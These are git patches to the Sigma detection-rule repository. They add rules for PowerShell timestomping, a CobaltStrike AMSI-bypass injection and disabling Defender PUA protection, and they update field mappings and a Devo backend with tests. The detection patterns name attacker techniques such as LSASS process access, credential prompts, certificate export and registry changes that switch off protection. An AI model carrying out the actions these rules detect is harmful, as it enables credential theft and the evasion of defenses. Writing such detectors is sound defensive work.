a/rules/windows/powershell/powershell_timestomp.yml b/rules/windows/powershell/powershell_timestomp.yml new file mode 100644 index 00000000..bc0cb449 --- /dev/null +++ b/rules/windows/powershell/powershell_timestomp.yml @@ -0,0 +1,33 @@ +title: Powershell Timestomp +id: c6438007-e081-42ce-9483-b067fbef33c3 +status: experimental +author: frack113 +date: 2021/08/03 +description: | + Adversaries may modify file time attributes to hide new or changes to existing files. + Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md + - https://www.offensive-security.com/metasploit-unleashed/timestomp/ +tags: + - attack.defense_evasion + - attack.t1070.006 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection_id: + EventID: 4104 + selection_ioc: + ScriptBlockText|contains: + - '.CreationTime =' + - '.LastWriteTime =' + - '.LastAccessTime =' + - '[IO.File]::SetCreationTime' + - '[IO.File]::SetLastAccessTime' + - '[IO.File]::SetLastWriteTime' + condition: selection_id and selection_ioc +falsepositives: + - legitime admin script +level: medium \ No newline at end of file From 692bc9a63ac62c1b8c6bf373af1dd05596a283d6 Mon Sep 17 00:00:00 2001 From: eocete Date: Wed, 4 Aug 2021 08:52:32 +0200 Subject: [PATCH 0163/1367] Added support for multicondition rules using Devo subqueries --- tools/sigma/backends/devo.py | 41 ++++++++++++++++++++++++++++---- tools/tests/test_backend_devo.py | 25 +++++++++++++++++++ 2 files changed, 62 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/devo.py b/tools/sigma/backends/devo.py index aeca596f..3d6db147 100644 --- a/tools/sigma/backends/devo.py +++ b/tools/sigma/backends/devo.py @@ -53,6 +53,7 @@ class DevoBackend(SingleTextQueryBackend): reEscape = re.compile('("|(? 1: + self.hasMulticondition = True + else: + self.hasMulticondition = False + + results = [] for parsed in sigmaparser.condparsed: # Multi condition rules are not supported yet, only the first one will be processed query = self.generateQuery(parsed) @@ -251,4 +271,17 @@ class DevoBackend(SingleTextQueryBackend): if after is not None: result += after - return result \ No newline at end of file + results.append(result) + + if self.hasMulticondition: + prefix = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link where ' + suffix = " select *" + for i in range(len(results)): + results[i] = "subquery_link in ( " + results[i] + results[i] += ")" + + body = " or ".join(results) + + return prefix + body + suffix + + return results[0] diff --git a/tools/tests/test_backend_devo.py b/tools/tests/test_backend_devo.py index 9dd412b7..4d6c1a6a 100644 --- a/tools/tests/test_backend_devo.py +++ b/tools/tests/test_backend_devo.py @@ -214,6 +214,31 @@ class TestDevoBackend(unittest.TestCase): # Act & Assert self.validate(detection, expected_result) + def testMulticondition(self): + # Arrange + detection = {"selection1": {"fieldname1": "value1"}, + "selection2": {"fieldname2": "value2"}, + "condition": ["selection1", "selection2"]} + expected_result = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link' \ + ' where subquery_link in ( from ' + self.table + \ + ' where fieldname1 = "value1" select "link" as subquery_link) or subquery_link in ( from ' + self.table + \ + ' where fieldname2 = "value2" select "link" as subquery_link) select *' + # Act & Assert + self.validate(detection, expected_result) + + def testMulticonditionAgg(self): + # Arrange + detection = {"selection1": {"fieldname1": "value1"}, + "selection2": {"fieldname2": "value2"}, + "condition": ["selection1 | count(fieldname1) by fieldname2 > 3", "selection2 | count(fieldname3) by fieldname4 > 3"]} + expected_result = 'from siem.logtrust.alert.info select "link" as subquery_link group every 24h by subquery_link' \ + ' where subquery_link in ( from ' + self.table + ' where fieldname1 = "value1" select "link" as' \ + ' subquery_link group every - by subquery_link,fieldname2 select count(fieldname1) as agg where agg > 3 select *)' \ + ' or subquery_link in ( from ' + self.table + ' where fieldname2 = "value2" select "link" as ' \ + 'subquery_link group every - by subquery_link,fieldname4 select count(fieldname3) as agg where agg > 3 select *) select *' + # Act & Assert + self.validate(detection, expected_result) + def validate(self, detection, expectation): config = SigmaConfiguration() From 994701bd8ea53019b554ce8e36699429c2213c0a Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 4 Aug 2021 11:28:58 +0200 Subject: [PATCH 0164/1367] CobaltStrike injected AMSI bypass --- .../sysmon_injected_amsi_bypass.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/process_access/sysmon_injected_amsi_bypass.yml diff --git a/rules/windows/process_access/sysmon_injected_amsi_bypass.yml b/rules/windows/process_access/sysmon_injected_amsi_bypass.yml new file mode 100644 index 00000000..d8e898ae --- /dev/null +++ b/rules/windows/process_access/sysmon_injected_amsi_bypass.yml @@ -0,0 +1,24 @@ +title: CobaltStrike BOF Injecting AMSI Bypass +id: 09706624-b7f6-455d-9d02-adee024cee1d +description: Detects the usage of a CobaltStrike BOF which injects an AMSI Bypass +references: + - https://github.com/boku7/injectAmsiBypass +status: experimental +author: Christian Burkard +date: 2021/08/04 +logsource: + category: process_access + product: windows +detection: + selection: + CallTrace|re: '^C:\\Windows\\SYSTEM32\\ntdll\.dll\+[a-z0-9]{4,6}\|C:\\Windows\\System32\\KERNELBASE\.dll\+[a-z0-9]{4,6}\|UNKNOWN\([A-Z0-9]{16}\)$' + GrantedAccess: '0x1028' + condition: selection +falsepositives: + - unkown +level: high +tags: + - attack.execution + - attack.t1106 + - attack.defense_evasion + - attack.t1562.001 From f040725dd85e9f64cb1a0c7a8ad911de3b9bc49e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 14:49:50 +0200 Subject: [PATCH 0165/1367] fix EventID: 4104 ScriptBlockText --- .../powershell/powershell_CL_Invocation_LOLScript.yml | 1 + .../powershell/powershell_CL_Invocation_LOLScript_v2.yml | 1 + .../powershell/powershell_CL_Mutexverifiers_LOLScript.yml | 1 + .../powershell_CL_Mutexverifiers_LOLScript_v2.yml | 1 + rules/windows/powershell/powershell_accessing_win_api.yml | 7 ++++--- .../windows/powershell/powershell_automated_collection.yml | 1 - .../powershell/powershell_clear_powershell_history.yml | 1 + rules/windows/powershell/powershell_create_local_user.yml | 6 +++--- .../windows/powershell/powershell_decompress_commands.yml | 1 + rules/windows/powershell/powershell_dnscat_execution.yml | 1 + rules/windows/powershell/powershell_get_clipboard.yml | 1 + rules/windows/powershell/powershell_icmp_exfiltration.yml | 1 + .../powershell/powershell_invoke_obfuscation_clip+.yml | 1 + .../powershell_invoke_obfuscation_obfuscated_iex.yml | 1 + .../powershell/powershell_invoke_obfuscation_stdin+.yml | 1 + .../powershell/powershell_invoke_obfuscation_var+.yml | 1 + .../powershell_invoke_obfuscation_via_compress.yml | 1 + .../powershell_invoke_obfuscation_via_rundll.yml | 1 + .../powershell/powershell_invoke_obfuscation_via_stdin.yml | 1 + .../powershell_invoke_obfuscation_via_use_clip.yml | 1 + .../powershell_invoke_obfuscation_via_use_mhsta.yml | 1 + .../powershell_invoke_obfuscation_via_use_rundll32.yml | 1 + .../powershell/powershell_invoke_obfuscation_via_var++.yml | 1 + rules/windows/powershell/powershell_prompt_credentials.yml | 4 ++-- .../powershell_suspicious_export_pfxcertificate.yml | 4 ++-- .../powershell/powershell_suspicious_getprocess_lsass.yml | 4 ++-- .../powershell_suspicious_mounted_share_deletion.yml | 1 + rules/windows/powershell/win_powershell_web_request.yml | 1 + 28 files changed, 35 insertions(+), 13 deletions(-) diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml index 4189204e..3976c19f 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml index c8b63179..5cd1d3ad 100644 --- a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml index 341b51f7..a9e742a2 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml index c4b47e1b..8a0fa3a3 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml index 6fdcc095..aa74974e 100644 --- a/rules/windows/powershell/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_accessing_win_api.yml @@ -4,6 +4,7 @@ status: experimental description: Detecting use WinAPI Functions in PowerShell author: Nikita Nazarov, oscd.community date: 2020/10/06 +modified: 2021/08/04 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: @@ -13,11 +14,11 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: - EventID: - - 4104 - Message|contains: + EventID: 4104 + ScriptBlockText|contains: - 'WaitForSingleObject' - 'QueueUserApc' - 'RtlCreateUserThread' diff --git a/rules/windows/powershell/powershell_automated_collection.yml b/rules/windows/powershell/powershell_automated_collection.yml index b3e00512..d482a22b 100644 --- a/rules/windows/powershell/powershell_automated_collection.yml +++ b/rules/windows/powershell/powershell_automated_collection.yml @@ -32,7 +32,6 @@ detection: - 'Get-ChildItem' - ' -Recurse ' - ' -Include ' - condition: all of them falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index 695c01d0..e937037d 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_create_local_user.yml index d2ef2c64..6fd05f5c 100644 --- a/rules/windows/powershell/powershell_create_local_user.yml +++ b/rules/windows/powershell/powershell_create_local_user.yml @@ -13,15 +13,15 @@ tags: - attack.t1136 # an old one author: '@ROxPinTeddy' date: 2020/04/11 -modified: 2020/08/24 +modified: 2021/08/04 logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 - Message|contains: - - 'New-LocalUser' + ScriptBlockText|contains: 'New-LocalUser' condition: selection falsepositives: - Legitimate user creation diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_decompress_commands.yml index e5c17ef9..bdef59f8 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_decompress_commands.yml @@ -13,6 +13,7 @@ references: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_dnscat_execution.yml index 950bea72..63a590f3 100644 --- a/rules/windows/powershell/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_dnscat_execution.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_get_clipboard.yml index 46e8374c..26282f89 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_get_clipboard.yml @@ -13,6 +13,7 @@ references: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_icmp_exfiltration.yml index 373f679a..c6e83568 100644 --- a/rules/windows/powershell/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_icmp_exfiltration.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml index 7d9b4abc..8438323a 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index 0dea2bd5..dd5771b8 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml index 7e2b0ef2..f1969a38 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml index 9c2ab871..61e5ee7e 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml index 365149a5..8fde7bb9 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml index 793dc3c1..e26c5a29 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml index ab358c64..5b638d94 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml index 5f514bc6..5adbdedc 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml index 45764546..07f71af3 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml index a0abb761..cc5e50e6 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml index 0dcbf692..f1d98861 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml @@ -15,6 +15,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_prompt_credentials.yml index 4513b1dd..8ef73b44 100644 --- a/rules/windows/powershell/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_prompt_credentials.yml @@ -12,6 +12,7 @@ tags: - attack.t1086 # an old one author: John Lambert (idea), Florian Roth (rule) date: 2017/04/09 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -20,8 +21,7 @@ detection: selection: EventID: 4104 keyword: - Message|contains: - - 'PromptForCredential' + ScriptBlockText|contains: 'PromptForCredential' condition: all of them falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index ac4077fd..6f1dfeba 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml @@ -10,6 +10,7 @@ tags: - attack.t1552.004 author: Florian Roth date: 2021/04/23 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -17,8 +18,7 @@ logsource: detection: keywords: EventID: 4104 - ScriptBlockText|contains: - - "Export-PfxCertificate" + ScriptBlockText|contains: "Export-PfxCertificate" condition: keywords falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml index cb8754e2..c08f0ca5 100644 --- a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml +++ b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml @@ -9,6 +9,7 @@ tags: - attack.t1003.001 author: Florian Roth date: 2021/04/23 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -16,8 +17,7 @@ logsource: detection: keywords: EventID: 4104 - ScriptBlockText|contains: - - 'Get-Process lsass' + ScriptBlockText|contains: 'Get-Process lsass' condition: keywords falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml index f0ca3127..c040e3a5 100644 --- a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/win_powershell_web_request.yml b/rules/windows/powershell/win_powershell_web_request.yml index bde82f4b..37e172c9 100644 --- a/rules/windows/powershell/win_powershell_web_request.yml +++ b/rules/windows/powershell/win_powershell_web_request.yml @@ -35,6 +35,7 @@ detection: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 From 21228a21c78a6e45f6dcbd414c2ea23fa9f3a918 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:09:02 +0200 Subject: [PATCH 0166/1367] update SYSMON Hashes --- tools/config/winlogbeat-modules-enabled.yml | 21 +++++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index eb3bf37c..4b05f3d5 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -146,7 +146,6 @@ fieldmappings: Image: process.executable ImageLoaded: file.path ImagePath: winlog.event_data.ImagePath - Imphash: process.pe.imphash IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength @@ -265,7 +264,6 @@ fieldmappings: SamAccountName: winlog.event_data.SamAccountName Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames - sha1: hash.sha1 SidHistory: winlog.event_data.SidHistory Signed: winlog.event_data.Signed SourceAddress: source.ip @@ -279,3 +277,22 @@ fieldmappings: # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName Workstation: winlog.event_data.Workstation + # SYSMON Hashes + Hashes: winlog.event_data.Hashes + # extraction from Hashes NOT a original field but find in some rule + md5: + category=driver_load: hash.md5 + category=image_load: file.hash.md5 + default: process.hash.md5 + sha1: + category=driver_load: hash.sha1 + category=image_load: file.hash.sha1 + default: process.hash.sha1 + sha256: + category=driver_load: hash.sha256 + category=image_load: file.hash.sha256 + default: process.hash.sha256 + Imphash: + category=driver_load: hash.imphash + category=image_load: file.hash.imphash + default: process.pe.imphash \ No newline at end of file From 47086d5d7869d9f88a23bc0619ec29fdd1c39ea8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:12:01 +0200 Subject: [PATCH 0167/1367] fix duplicate --- tools/config/winlogbeat-modules-enabled.yml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 4b05f3d5..b7bbd88c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -133,13 +133,6 @@ fieldmappings: FailureCode: winlog.event_data.FailureCode FileName: file.path GrantedAccess: winlog.event_data.GrantedAccess - GroupName: - - winlog.event_data.GroupName - - group.name - GroupSid: - - group.id - - winlog.event_data.GroupSid - Hashes: winlog.event_data.Hashes file_hash: winlog.event_data.Hashes HiveName: winlog.event_data.HiveName HostVersion: winlog.event_data.HostVersion From 481cd9aca19fff64caa5ff30642d06e3c58d942f Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:46:05 +0200 Subject: [PATCH 0168/1367] add security 7045 --- tools/config/winlogbeat-modules-enabled.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index b7bbd88c..e164ff6c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -138,7 +138,6 @@ fieldmappings: HostVersion: winlog.event_data.HostVersion Image: process.executable ImageLoaded: file.path - ImagePath: winlog.event_data.ImagePath IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength @@ -162,7 +161,6 @@ fieldmappings: ScriptBlockText: powershell.file.script_block_text SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName - ServiceName: winlog.event_data.ServiceName ShareName: winlog.event_data.ShareName Signature: winlog.event_data.Signature Source: winlog.event_data.Source @@ -288,4 +286,11 @@ fieldmappings: Imphash: category=driver_load: hash.imphash category=image_load: file.hash.imphash - default: process.pe.imphash \ No newline at end of file + default: process.pe.imphash + #security 7045 + ServiceName: + service=security: winlog.event_data.ServiceName + default: service.name + ImagePath: winlog.event_data.ImagePath + ServiceType: winlog.event_data.ServiceType + StartType: winlog.event_data.ServiceStartType From 882ea7ec2258df208c8f93867bb2188ddc806b79 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 4 Aug 2021 15:50:39 +0200 Subject: [PATCH 0169/1367] fix: remove unnecessary single value list --- .../process_access/sysmon_direct_syscall_ntopenprocess.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml index 05865dff..433cc150 100755 --- a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -11,8 +11,7 @@ logsource: product: windows detection: selection: - CallTrace|startswith: - - 'UNKNOWN' + CallTrace|startswith: 'UNKNOWN' condition: selection falsepositives: - unkown From f89ba18c5dc7ba1f908e0db3e29484dd308f0f9c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 11:27:41 -0500 Subject: [PATCH 0170/1367] Create sysmon_disabled_pua_protection_on_microsoft_defender.yml --- ...d_pua_protection_on_microsoft_defender.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml new file mode 100644 index 00000000..6cda0a7f --- /dev/null +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -0,0 +1,24 @@ +title: Disable PUA Protection on Windows Defender +id: 8ffc5407-52e3-478f-9596-0a7371eafe13 +description: Detects disabling Windows Defender PUA protection +status: experimental +date: 2021/08/04 +author: Austin Songer @austinsonger +references: + - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html +tags: + - attack.defense_evasion +logsource: + category: registry_event + product: windows +detection: + selection: + EventType: SetValue + TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' + TargetObject|endswith: + - PUAProtection + Details: 'DWORD (0x00000000)' + condition: selection +falsepositives: + - Unknown +level: high From bae075713c101525a6b445fd72fc63d5b7a34457 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 13:10:37 -0500 Subject: [PATCH 0171/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- ...smon_disabled_pua_protection_on_microsoft_defender.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index 6cda0a7f..e79e6055 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -10,15 +10,13 @@ tags: - attack.defense_evasion logsource: category: registry_event - product: windows + product: windows detection: selection: EventType: SetValue - TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' - TargetObject|endswith: - - PUAProtection + TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' Details: 'DWORD (0x00000000)' - condition: selection + condition: selection falsepositives: - Unknown level: high From 8d195bf5d57f8816035fb896af16b7f259b45860 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 13:11:31 -0500 Subject: [PATCH 0172/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- .../sysmon_disabled_pua_protection_on_microsoft_defender.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index e79e6055..7486226a 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -14,7 +14,7 @@ logsource: detection: selection: EventType: SetValue - TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' + TargetObject|contains: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' Details: 'DWORD (0x00000000)' condition: selection falsepositives: From 6a2663a3ae533e1e47b3e2ea8df72870537cf10e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 17:00:34 -0500 Subject: [PATCH 0173/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- .../sysmon_disabled_pua_protection_on_microsoft_defender.yml | 1 + 1 file changed, 1 insertion(+) 